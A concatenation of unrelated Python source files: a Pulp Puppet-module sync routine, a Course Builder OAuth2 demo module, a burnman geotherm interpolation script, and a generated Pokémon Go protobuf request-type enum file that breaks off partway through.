self._canceled = True
if self.downloader is None:
return
self.downloader.cancel()
def _parse_metadata(self):
"""
Takes the necessary actions (according to the run configuration) to
retrieve and parse the repository's metadata. This call will return
either the successfully parsed metadata or None if it could not
be retrieved or parsed. The progress report will be updated with the
appropriate description of what went wrong in the event of an error,
so the caller should interpet a None return as an error occuring and
not continue the sync.
:return: object representation of the metadata
:rtype: RepositoryMetadata
"""
_logger.info('Beginning metadata retrieval for repository <%s>' % self.repo.id)
self.progress_report.metadata_state = STATE_RUNNING
self.progress_report.update_progress()
start_time = datetime.now()
# Retrieve the metadata from the source
try:
downloader = self._create_downloader()
self.downloader = downloader
metadata_json_docs = downloader.retrieve_metadata(self.progress_report)
except Exception, e:
if self._canceled:
_logger.warn('Exception occurred on canceled metadata download: %s' % e)
self.progress_report.metadata_state = STATE_CANCELED
return None
_logger.exception('Exception while retrieving metadata for repository <%s>' % self.repo.id)
self.progress_report.metadata_state = STATE_FAILED
self.progress_report.metadata_error_message = _('Error downloading metadata')
self.progress_report.metadata_exception = e
self.progress_report.metadata_traceback = sys.exc_info()[2]
end_time = datetime.now()
duration = end_time - start_time
self.progress_report.metadata_execution_time = duration.seconds
self.progress_report.update_progress()
return None
finally:
self.downloader = None
# Parse the retrieved metadata documents
try:
metadata = RepositoryMetadata()
for doc in metadata_json_docs:
metadata.update_from_json(doc)
except Exception, e:
_logger.exception('Exception parsing metadata for repository <%s>' % self.repo.id)
self.progress_report.metadata_state = STATE_FAILED
self.progress_report.metadata_error_message = _('Error parsing repository modules metadata document')
self.progress_report.metadata_exception = e
self.progress_report.metadata_traceback = sys.exc_info()[2]
end_time = datetime.now()
duration = end_time - start_time
self.progress_report.metadata_execution_time = duration.seconds
self.progress_report.update_progress()
return None
# Last update to the progress report before returning
self.progress_report.metadata_state = STATE_SUCCESS
end_time = datetime.now()
duration = end_time - start_time
self.progress_report.metadata_execution_time = duration.seconds
self.progress_report.update_progress()
return metadata
def _import_modules(self, metadata):
"""
Imports each module in the repository into Pulp.
This method is mostly just a wrapper on top of the actual logic
of performing an import to set the stage for the progress report and
more importantly catch any rogue exceptions that crop up.
:param metadata: object representation of the repository metadata
containing the modules to import
:type metadata: RepositoryMetadata
"""
_logger.info('Retrieving modules for repository <%s>' % self.repo.id)
self.progress_report.modules_state = STATE_RUNNING
# Do not send the update about the state yet. The counts need to be
# set later once we know how many are new, so to prevent a situation
# where the report reflectes running but does not have counts, wait
# until they are populated before sending the update to Pulp.
start_time = datetime.now()
# Perform the actual logic
try:
self._do_import_modules(metadata)
except Exception, e:
_logger.exception('Exception importing modules for repository <%s>' % self.repo.id)
self.progress_report.modules_state = STATE_FAILED
self.progress_report.modules_error_message = _('Error retrieving modules')
self.progress_report.modules_exception = e
self.progress_report.modules_traceback = sys.exc_info()[2]
end_time = datetime.now()
duration = end_time - start_time
self.progress_report.modules_execution_time = duration.seconds
self.progress_report.update_progress()
return
# Last update to the progress report before returning
self.progress_report.modules_state = STATE_SUCCESS
end_time = datetime.now()
duration = end_time - start_time
self.progress_report.modules_execution_time = duration.seconds
self.progress_report.update_progress()
def _do_import_modules(self, metadata):
"""
Actual logic of the import. This method will do a best effort per module;
if an individual module fails it will be recorded and the import will
continue. This method will only raise an exception in an extreme case
where it cannot react and continue.
"""
def unit_key_str(unit_key_dict):
"""
Converts the unit key dict form into a single string that can be
used as the key in a dict lookup.
"""
template = '%s-%s-%s'
return template % (encode_unicode(unit_key_dict['name']),
encode_unicode(unit_key_dict['version']),
encode_unicode(unit_key_dict['author']))
downloader = self._create_downloader()
self.downloader = downloader
# Ease lookup of modules
modules_by_key = dict([(unit_key_str(m.unit_key()), m) for m in metadata.modules])
# Collect information about the repository's modules before changing it
module_criteria = UnitAssociationCriteria(type_ids=[constants.TYPE_PUPPET_MODULE])
existing_units = self.sync_conduit.get_units(criteria=module_criteria)
existing_modules = [Module.from_unit(x) for x in existing_units]
existing_module_keys = [unit_key_str(m.unit_key()) for m in existing_modules]
new_unit_keys = self._resolve_new_units(existing_module_keys, modules_by_key.keys())
remove_unit_keys = self._resolve_remove_units(existing_module_keys, modules_by_key.keys())
# Once we know how many things need to be processed, we can update the
# progress report
self.progress_report.modules_total_count = len(new_unit_keys)
self.progress_report.modules_finished_count = 0
self.progress_report.modules_error_count = 0
self.progress_report.update_progress()
# Add new units
for key in new_unit_keys:
if self._canceled:
break
module = modules_by_key[key]
try:
self._add_new_module(downloader, module)
self.progress_report.modules_finished_count += 1
except Exception, e:
self.progress_report.add_failed_module(module, e, sys.exc_info()[2])
self.progress_report.update_progress()
# Remove missing units if the configuration indicates to do so
if self._should_remove_missing():
existing_units_by_key = {}
for u in existing_units:
unit_key = Module.generate_unit_key(u.unit_key['name'], u.unit_key['version'], u.unit_key['author'])
s = unit_key_str(unit_key)
existing_units_by_key[s] = u
for key in remove_unit_keys:
doomed = existing_units_by_key[key]
self.sync_conduit.remove_unit(doomed)
self.downloader = None
def _add_new_module(self, downloader, module):
"""
Performs the tasks for downloading and saving a new unit in Pulp.
:param downloader: downloader instance to use for retrieving the unit
:param module: module instance to download
:type module: Module
"""
# Initialize the unit in Pulp
type_id = constants.TYPE_PUPPET_MODULE
unit_key = module.unit_key()
unit_metadata = {} # populated later but needed for the init call
relative_path = constants.STORAGE_MODULE_RELATIVE_PATH % module.filename()
unit = self.sync_conduit.init_unit(type_id, unit_key, unit_metadata,
relative_path)
try:
if not self._module_exists(unit.storage_path):
# Download the bits
downloaded_filename = downloader.retrieve_module(self.progress_report, module)
# Copy them to the final location
shutil.copy(downloaded_filename, unit.storage_path)
# Extract the extra metadata into the module
metadata_json = metadata_module.extract_metadata(unit.storage_path, self.repo.working_dir)
module = Module.from_json(metadata_json)
# Update the unit with the extracted metadata
unit.metadata.update(module.unit_metadata())
# Save the unit and associate it to the repository
self.sync_conduit.save_unit(unit)
finally:
# Clean up the temporary module
downloader.cleanup_module(module)
def _module_exists(self, filename):
"""
Determines if the module at the given filename is already downloaded.
:param filename: full path to the module in Pulp
:type filename: str
:return: true if the module file already exists; false otherwise
:rtype: bool
"""
return os.path.exists(filename)
def _resolve_new_units(self, existing_unit_keys, found_unit_keys):
"""
Returns a list of unit keys that are new to the repository.
:return: list of unit keys; empty list if none are new
:rtype: list
"""
return list(set(found_unit_keys) - set(existing_unit_keys))
def _resolve_remove_units(self, existing_unit_keys, found_unit_keys):
"""
Returns a list of unit keys that are in the repository but not in
the current repository metadata.
:return: list of unit keys; empty list if none have been removed
:rtype: list
"""
return list(set(existing_unit_keys) - set(found_unit_keys))
def _create_downloader(self):
"""
Uses the configuratoin to determine which downloader style to use
for this run.
:return: one of the *Downloader classes in the downloaders module
"""
feed = self.config.get(constants.CONFIG_FEED)
downloader = downloader_factory.get_downloader(feed, self.repo, self.sync_conduit, self.config)
return downloader
def _should_remove_missing(self):
"""
Returns whether or not missing units should be removed.
:return: true if missing units should be removed; false otherwise
:rtype: bool
"""
if constants.CONFIG_REMOVE_MISSING not in self.config.keys():
return constants.DEFAULT_REMOVE_MISSING
else:
return self.config.get_boolean(constants.CONFIG_REMOVE_MISSING)
|
ehiller/mobilecsp-v18
|
refs/heads/master
|
modules/oauth2/oauth2.py
|
3
|
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Oauth2 module implementation.
In order to use this module with your app you must enable it in main.py by
changing
modules.oauth2.oauth2.register_module()
to
modules.oauth2.oauth2.register_module().enable()
Additionally, you must:
1. Visit https://code.google.com/apis/console. Click on API Access and create a
client id for your web app with redirect URI set to:
https://<appid>.appspot|googleplex.com/<callback_uri>
and optionally include
http://localhost:<port>/<callback_uri>
where <appid> is your app id, <callback_uri> is the oauth2 callback URI you'd
like to use, and <port> is the port you'd like to use for localhost. You can
set <port> and <callback_uri> to basically whatever you want as long as they
are unique.
2. Once you've created the client id, click Download JSON. Take the file you get
and overwrite client_secrets.json in this directory.
3. In https://code.google.com/apis/console, click on Services and enable the
services your app requires. For these demos, you'll need to enable Drive API
and Google+.
Whenever you change scopes you'll need to revoke your access tokens. You can do
this at https://accounts.google.com/b/0/IssuedAuthSubTokens.
You can find a list of the available APIs at
http://api-python-client-doc.appspot.com/.
Finally, a note about dependencies. Oauth2 requires google-api-python-client,
which you can find at https://code.google.com/p/google-api-python-client/. We
bundle version 1.1 with Course Builder. It requires httplib2, which you can find
at https://code.google.com/p/httplib2/. We bundle version 0.8 with Course
Builder.
It also requires python-gflags from https://code.google.com/p/python-gflags/. We
bundle 2.0 with Course Builder, and we've repackaged the downloadable .tar.gz as
a .zip so Python can load its contents directly from sys.path.
Good luck!
"""
__author__ = [
'johncox@google.com (John Cox)',
]
import os
import traceback
from apiclient import discovery
from oauth2client import appengine
import webapp2
from common import jinja_utils
from common import safe_dom
from models import custom_modules
# In real life we'd check in a blank file and set up the code to error with a
# message pointing people to https://code.google.com/apis/console.
_CLIENTSECRETS_JSON_PATH = os.path.join(
os.path.dirname(__file__), 'client_secrets.json')
_TEMPLATES_DIR = os.path.join(os.path.dirname(__file__), 'templates')
class _ErrorDecorator(object):
"""Decorator used when a real decorator cannot be created.
Most often this is because there is no valid client_secrets.json. This
decorator replaces the wrapped method with one that either is a no-op, or,
if an error was given, displays the error.
"""
def __init__(self, **kwargs):
self.callback_path = 'not_enabled'
self.error = kwargs.pop('error', '')
def callback_handler(self):
"""Stub for API compatibility."""
pass
def oauth_required(self, unused_method):
"""Prints an error messsage and exits with a 500."""
def print_error_and_return_500(
request_handler, *unused_args, **unused_kwargs):
contents = safe_dom.NodeList().append(
safe_dom.Element('h1').add_text('500 internal server error')
).append(
safe_dom.Element('pre').add_text(self.error)
)
request_handler.response.write(contents.sanitized)
request_handler.response.status = 500
return print_error_and_return_500
# In real life we'd want to make one decorator per service because we wouldn't
# want users to have to give so many permissions.
def _build_decorator():
"""Builds a decorator for using oauth2 with webapp2.RequestHandlers."""
try:
return appengine.oauth2decorator_from_clientsecrets(
_CLIENTSECRETS_JSON_PATH,
scope=[
'https://www.googleapis.com/auth/drive.readonly',
'https://www.googleapis.com/auth/plus.login',
'https://www.googleapis.com/auth/userinfo.email',
'https://www.googleapis.com/auth/userinfo.profile',
],
message='client_secrets.json missing')
# Deliberately catch everything. pylint: disable=broad-except
except Exception as e:
display_error = (
'oauth2 module enabled, but unable to load client_secrets.json. '
'See docs in modules/oauth2.py. Original exception was:\n\n%s') % (
traceback.format_exc(e))
return _ErrorDecorator(error=display_error)
_DECORATOR = _build_decorator()
class ServiceHandler(webapp2.RequestHandler):
def build_service(self, oauth2_decorator, name, version):
http = oauth2_decorator.credentials.authorize(oauth2_decorator.http())
return discovery.build(name, version, http=http)
class _ExampleHandler(ServiceHandler):
def _write_result(self, service_name, result):
template = jinja_utils.get_template('result.html', [_TEMPLATES_DIR])
self.response.out.write(template.render({
'service_name': service_name,
'result': result,
}))
class GoogleDriveHandler(_ExampleHandler):
@_DECORATOR.oauth_required
def get(self):
drive = self.build_service(_DECORATOR, 'drive', 'v2')
about = drive.about().get().execute()
self._write_result('Drive', about['user']['displayName'])
class GoogleOauth2Handler(_ExampleHandler):
@_DECORATOR.oauth_required
def get(self):
oauth2 = self.build_service(_DECORATOR, 'oauth2', 'v2')
userinfo = oauth2.userinfo().get().execute()
self._write_result('Oauth2', userinfo['name'])
class GooglePlusHandler(_ExampleHandler):
@_DECORATOR.oauth_required
def get(self):
plus = self.build_service(_DECORATOR, 'plus', 'v1')
# This call will barf if you're logged in as @google.com because your
# profile will not be fetchable. Log in as @gmail.com and you'll be
# fine.
me = plus.people().get(userId='me').execute()
self._write_result('Plus', me['displayName'])
# None or custom_modules.Module. Placeholder for the module created by
# register_module.
module = None
def register_module():
"""Adds this module to the registry."""
global module # pylint: disable=global-statement
handlers = [
('/oauth2_google_drive', GoogleDriveHandler),
('/oauth2_google_oauth2', GoogleOauth2Handler),
('/oauth2_google_plus', GooglePlusHandler),
(_DECORATOR.callback_path, _DECORATOR.callback_handler()),
]
module = custom_modules.Module('Oauth2', 'Oauth2 pages', handlers, [])
return module
|
tjhei/burnman_old
|
refs/heads/master
|
geotherm.py
|
1
|
import numpy
import bisect
import matplotlib.pyplot as pyplot
import prem
from tools import *
# loads a simple geotherm from geotherm.txt
# geotherm from geotherm.txt, from Cayman
# pressure: in GPa
# return: temperature in K
def geotherm(pressure):
idx = bisect.bisect_left(table_p, pressure) - 1
if (idx < 0):
return table_T[0]
elif (idx < len(table_p)-1):
return linear_interpol(pressure, table_p[idx], table_p[idx+1], table_T[idx], table_T[idx+1])
else:
return table_T[idx]
# polynomial fit from Watson, Baxter, EPSL, 2007
# pressure: in GPa
# return: temperature in K
def geotherm_formula(pressure):
if (pressure <= 15):
return 1900-1420*pow(0.8,pressure)
else:
return 1680+11.1*pressure
# geotherm from Brown81
def geotherm_brown(pressure):
depth = 6371. - prem.prem_radius(pressure)
idx = bisect.bisect_left(table_brown_depth, depth) - 1
if (idx < 0):
return table_brown[0][1]
elif (idx < len(table_brown)-1):
return linear_interpol(depth, table_brown_depth[idx], table_brown_depth[idx+1], table_brown[idx][1], table_brown[idx+1][1])
else:
return table_brown[idx][1]
table_brown = read_table("data/brown_81.txt")
table_brown_depth = numpy.array(table_brown)[:,0]
geotherm_table = read_table("data/geotherm.txt")
geotherm_table = sort_table(geotherm_table, 0)
table_p=numpy.array(geotherm_table)[:,0]
table_T=numpy.array(geotherm_table)[:,1]
# test geotherm
if __name__ == "__main__":
p = numpy.arange(1.0,128.0,3)
t = [geotherm(y) for y in p]
t2 = [geotherm_formula(y) for y in p]
t3 = [geotherm_brown(y) for y in p]
p1,=pyplot.plot(p,t,'+-')
p2,=pyplot.plot(p,t2,'x--r')
p3,=pyplot.plot(p,t3,'*-g')
pyplot.xlim(25,135)
pyplot.ylim(1600,3100)
pyplot.legend([p1,p2,p3],["cayman", "watson", "brown"], loc=4)
pyplot.show()
|
waiyin21/test123
|
refs/heads/master
|
pogom/pgoapi/protos/POGOProtos/Networking/Requests_pb2.py
|
8
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos.Networking.Requests.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos.Networking.Requests.proto',
package='POGOProtos.Networking.Requests',
syntax='proto3',
serialized_pb=_b('\n$POGOProtos.Networking.Requests.proto\x12\x1ePOGOProtos.Networking.Requests\"e\n\x07Request\x12\x41\n\x0crequest_type\x18\x01 \x01(\x0e\x32+.POGOProtos.Networking.Requests.RequestType\x12\x17\n\x0frequest_message\x18\x02 \x01(\x0c*\xc1\x0c\n\x0bRequestType\x12\x10\n\x0cMETHOD_UNSET\x10\x00\x12\x11\n\rPLAYER_UPDATE\x10\x01\x12\x0e\n\nGET_PLAYER\x10\x02\x12\x11\n\rGET_INVENTORY\x10\x04\x12\x15\n\x11\x44OWNLOAD_SETTINGS\x10\x05\x12\x1b\n\x17\x44OWNLOAD_ITEM_TEMPLATES\x10\x06\x12\"\n\x1e\x44OWNLOAD_REMOTE_CONFIG_VERSION\x10\x07\x12\x0f\n\x0b\x46ORT_SEARCH\x10\x65\x12\r\n\tENCOUNTER\x10\x66\x12\x11\n\rCATCH_POKEMON\x10g\x12\x10\n\x0c\x46ORT_DETAILS\x10h\x12\x0c\n\x08ITEM_USE\x10i\x12\x13\n\x0fGET_MAP_OBJECTS\x10j\x12\x17\n\x13\x46ORT_DEPLOY_POKEMON\x10n\x12\x17\n\x13\x46ORT_RECALL_POKEMON\x10o\x12\x13\n\x0fRELEASE_POKEMON\x10p\x12\x13\n\x0fUSE_ITEM_POTION\x10q\x12\x14\n\x10USE_ITEM_CAPTURE\x10r\x12\x11\n\rUSE_ITEM_FLEE\x10s\x12\x13\n\x0fUSE_ITEM_REVIVE\x10t\x12\x10\n\x0cTRADE_SEARCH\x10u\x12\x0f\n\x0bTRADE_OFFER\x10v\x12\x12\n\x0eTRADE_RESPONSE\x10w\x12\x10\n\x0cTRADE_RESULT\x10x\x12\x16\n\x12GET_PLAYER_PROFILE\x10y\x12\x11\n\rGET_ITEM_PACK\x10z\x12\x11\n\rBUY_ITEM_PACK\x10{\x12\x10\n\x0c\x42UY_GEM_PACK\x10|\x12\x12\n\x0e\x45VOLVE_POKEMON\x10}\x12\x14\n\x10GET_HATCHED_EGGS\x10~\x12\x1f\n\x1b\x45NCOUNTER_TUTORIAL_COMPLETE\x10\x7f\x12\x15\n\x10LEVEL_UP_REWARDS\x10\x80\x01\x12\x19\n\x14\x43HECK_AWARDED_BADGES\x10\x81\x01\x12\x11\n\x0cUSE_ITEM_GYM\x10\x85\x01\x12\x14\n\x0fGET_GYM_DETAILS\x10\x86\x01\x12\x15\n\x10START_GYM_BATTLE\x10\x87\x01\x12\x0f\n\nATTACK_GYM\x10\x88\x01\x12\x1b\n\x16RECYCLE_INVENTORY_ITEM\x10\x89\x01\x12\x18\n\x13\x43OLLECT_DAILY_BONUS\x10\x8a\x01\x12\x16\n\x11USE_ITEM_XP_BOOST\x10\x8b\x01\x12\x1b\n\x16USE_ITEM_EGG_INCUBATOR\x10\x8c\x01\x12\x10\n\x0bUSE_INCENSE\x10\x8d\x01\x12\x18\n\x13GET_INCENSE_POKEMON\x10\x8e\x01\x12\x16\n\x11INCENSE_ENCOUNTER\x10\x8f\x01\x12\x16\n\x11\x41\x44\x44_FORT_MODIFIER\x10\x90\x01\x12\x13\n\x0e\x44ISK_ENCOUNTER\x10\x91\x01\x12!\n\x1c\x43OLLECT_DAILY_DEFENDER_BONUS\x10\x92\x01\x12\x14\n\x0fUPGRADE_POKEMON\x10\x93\x01\x12\x19\n\x14SET_FAVORITE_POKEMON\x10\x94\x01\x12\x15\n\x10NICKNAME_POKEMON\x10\x95\x01\x12\x10\n\x0b\x45QUIP_BADGE\x10\x96\x01\x12\x19\n\x14SET_CONTACT_SETTINGS\x10\x97\x01\x12\x15\n\x10GET_ASSET_DIGEST\x10\xac\x02\x12\x16\n\x11GET_DOWNLOAD_URLS\x10\xad\x02\x12\x1c\n\x17GET_SUGGESTED_CODENAMES\x10\x91\x03\x12\x1d\n\x18\x43HECK_CODENAME_AVAILABLE\x10\x92\x03\x12\x13\n\x0e\x43LAIM_CODENAME\x10\x93\x03\x12\x0f\n\nSET_AVATAR\x10\x94\x03\x12\x14\n\x0fSET_PLAYER_TEAM\x10\x95\x03\x12\x1b\n\x16MARK_TUTORIAL_COMPLETE\x10\x96\x03\x12\x16\n\x11LOAD_SPAWN_POINTS\x10\xf4\x03\x12\t\n\x04\x45\x43HO\x10\x9a\x05\x12\x1b\n\x16\x44\x45\x42UG_UPDATE_INVENTORY\x10\xbc\x05\x12\x18\n\x13\x44\x45\x42UG_DELETE_PLAYER\x10\xbd\x05\x12\x17\n\x12SFIDA_REGISTRATION\x10\xa0\x06\x12\x15\n\x10SFIDA_ACTION_LOG\x10\xa1\x06\x12\x18\n\x13SFIDA_CERTIFICATION\x10\xa2\x06\x12\x11\n\x0cSFIDA_UPDATE\x10\xa3\x06\x12\x11\n\x0cSFIDA_ACTION\x10\xa4\x06\x12\x11\n\x0cSFIDA_DOWSER\x10\xa5\x06\x12\x12\n\rSFIDA_CAPTURE\x10\xa6\x06\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_REQUESTTYPE = _descriptor.EnumDescriptor(
name='RequestType',
full_name='POGOProtos.Networking.Requests.RequestType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='METHOD_UNSET', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PLAYER_UPDATE', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_PLAYER', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_INVENTORY', index=3, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DOWNLOAD_SETTINGS', index=4, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DOWNLOAD_ITEM_TEMPLATES', index=5, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DOWNLOAD_REMOTE_CONFIG_VERSION', index=6, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORT_SEARCH', index=7, number=101,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ENCOUNTER', index=8, number=102,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CATCH_POKEMON', index=9, number=103,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORT_DETAILS', index=10, number=104,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ITEM_USE', index=11, number=105,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_MAP_OBJECTS', index=12, number=106,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORT_DEPLOY_POKEMON', index=13, number=110,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FORT_RECALL_POKEMON', index=14, number=111,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RELEASE_POKEMON', index=15, number=112,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_POTION', index=16, number=113,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_CAPTURE', index=17, number=114,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_FLEE', index=18, number=115,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_REVIVE', index=19, number=116,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TRADE_SEARCH', index=20, number=117,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TRADE_OFFER', index=21, number=118,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TRADE_RESPONSE', index=22, number=119,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TRADE_RESULT', index=23, number=120,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_PLAYER_PROFILE', index=24, number=121,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_ITEM_PACK', index=25, number=122,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BUY_ITEM_PACK', index=26, number=123,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BUY_GEM_PACK', index=27, number=124,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EVOLVE_POKEMON', index=28, number=125,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_HATCHED_EGGS', index=29, number=126,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ENCOUNTER_TUTORIAL_COMPLETE', index=30, number=127,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LEVEL_UP_REWARDS', index=31, number=128,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CHECK_AWARDED_BADGES', index=32, number=129,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_GYM', index=33, number=133,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_GYM_DETAILS', index=34, number=134,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='START_GYM_BATTLE', index=35, number=135,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ATTACK_GYM', index=36, number=136,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RECYCLE_INVENTORY_ITEM', index=37, number=137,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='COLLECT_DAILY_BONUS', index=38, number=138,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_XP_BOOST', index=39, number=139,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_ITEM_EGG_INCUBATOR', index=40, number=140,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='USE_INCENSE', index=41, number=141,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_INCENSE_POKEMON', index=42, number=142,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INCENSE_ENCOUNTER', index=43, number=143,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ADD_FORT_MODIFIER', index=44, number=144,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DISK_ENCOUNTER', index=45, number=145,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='COLLECT_DAILY_DEFENDER_BONUS', index=46, number=146,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UPGRADE_POKEMON', index=47, number=147,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SET_FAVORITE_POKEMON', index=48, number=148,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NICKNAME_POKEMON', index=49, number=149,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EQUIP_BADGE', index=50, number=150,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SET_CONTACT_SETTINGS', index=51, number=151,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_ASSET_DIGEST', index=52, number=300,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_DOWNLOAD_URLS', index=53, number=301,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GET_SUGGESTED_CODENAMES', index=54, number=401,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CHECK_CODENAME_AVAILABLE', index=55, number=402,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CLAIM_CODENAME', index=56, number=403,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SET_AVATAR', index=57, number=404,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SET_PLAYER_TEAM', index=58, number=405,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MARK_TUTORIAL_COMPLETE', index=59, number=406,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LOAD_SPAWN_POINTS', index=60, number=500,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ECHO', index=61, number=666,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DEBUG_UPDATE_INVENTORY', index=62, number=700,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DEBUG_DELETE_PLAYER', index=63, number=701,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_REGISTRATION', index=64, number=800,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_ACTION_LOG', index=65, number=801,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_CERTIFICATION', index=66, number=802,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_UPDATE', index=67, number=803,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_ACTION', index=68, number=804,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_DOWSER', index=69, number=805,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SFIDA_CAPTURE', index=70, number=806,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=176,
serialized_end=1777,
)
_sym_db.RegisterEnumDescriptor(_REQUESTTYPE)
RequestType = enum_type_wrapper.EnumTypeWrapper(_REQUESTTYPE)
METHOD_UNSET = 0
PLAYER_UPDATE = 1
GET_PLAYER = 2
GET_INVENTORY = 4
DOWNLOAD_SETTINGS = 5
DOWNLOAD_ITEM_TEMPLATES = 6
DOWNLOAD_REMOTE_CONFIG_VERSION = 7
FORT_SEARCH = 101
ENCOUNTER = 102
CATCH_POKEMON = 103
FORT_DETAILS = 104
ITEM_USE = 105
GET_MAP_OBJECTS = 106
FORT_DEPLOY_POKEMON = 110
FORT_RECALL_POKEMON = 111
RELEASE_POKEMON = 112
USE_ITEM_POTION = 113
USE_ITEM_CAPTURE = 114
USE_ITEM_FLEE = 115
USE_ITEM_REVIVE = 116
TRADE_SEARCH = 117
TRADE_OFFER = 118
TRADE_RESPONSE = 119
TRADE_RESULT = 120
GET_PLAYER_PROFILE = 121
GET_ITEM_PACK = 122
BUY_ITEM_PACK = 123
BUY_GEM_PACK = 124
EVOLVE_POKEMON = 125
GET_HATCHED_EGGS = 126
ENCOUNTER_TUTORIAL_COMPLETE = 127
LEVEL_UP_REWARDS = 128
CHECK_AWARDED_BADGES = 129
USE_ITEM_GYM = 133
GET_GYM_DETAILS = 134
START_GYM_BATTLE = 135
ATTACK_GYM = 136
RECYCLE_INVENTORY_ITEM = 137
COLLECT_DAILY_BONUS = 138
USE_ITEM_XP_BOOST = 139
USE_ITEM_EGG_INCUBATOR = 140
USE_INCENSE = 141
GET_INCENSE_POKEMON = 142
INCENSE_ENCOUNTER = 143
ADD_FORT_MODIFIER = 144
DISK_ENCOUNTER = 145
COLLECT_DAILY_DEFENDER_BONUS = 146
UPGRADE_POKEMON = 147
SET_FAVORITE_POKEMON = 148
NICKNAME_POKEMON = 149
EQUIP_BADGE = 150
SET_CONTACT_SETTINGS = 151
GET_ASSET_DIGEST = 300
GET_DOWNLOAD_URLS = 301
GET_SUGGESTED_CODENAMES = 401
CHECK_CODENAME_AVAILABLE = 402
CLAIM_CODENAME = 403
SET_AVATAR = 404
